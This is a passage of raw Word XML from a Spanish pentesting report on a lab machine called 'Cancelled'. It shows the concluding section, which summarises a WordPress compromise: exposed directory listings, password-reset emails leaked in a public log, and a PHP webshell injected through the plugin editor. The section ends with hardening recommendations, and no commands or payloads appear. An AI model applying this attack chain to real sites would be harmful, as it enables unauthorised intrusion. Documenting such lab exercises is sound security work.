          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5339715" cy="226695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18"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descr=""/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5339715" cy="226695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 18. Cierre del ejercicio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>9. Conclusiones y recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El compromiso de la máquina “Cancelled” fue posible mediante el encadenamiento de fallos de configuración de bajo riesgo individual, pero de alto impacto combinado:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Directory listing habilitado en múltiples rutas sensibles del sitio WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ausencia de un MTA real, que derivó en la exposición de correos de restablecimiento de contraseña en un archivo de log accesible públicamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Permisos excesivos en el editor de plugins, que permitió la inyección de una webshell PHP y, en consecuencia, ejecución remota de código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se recomienda deshabilitar el listado de directorios en el servidor web, restringir o eliminar el editor de plugins/temas desde el panel de administración, configurar un MTA adecuado o un proveedor SMTP externo, y aplicar control de acceso estricto sobre archivos de configuración y logs.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId20"/>
      <w:footerReference w:type="default" r:id="rId21"/>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55555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:t>13</w:t>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="555555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:instrText xml:space="preserve"> NUMPAGES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999999"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9026" w:leader="none"/>
      </w:tabs>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="555555"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Informe de Pentesting — Máquina Cancelled</w:t>
      <w:tab/>
      <w:t>WhoamiLabs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2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s-VE"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1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="es-VE"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1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="es-VE" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="es-V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13</Pages>
  <Words>953</Words>
  <Characters>6037</Characters>
  <CharactersWithSpaces>6879</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2026-09-20T19:17:42Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <dc:description/>
  <dc:language>es-VE</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-20T15:22:26Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>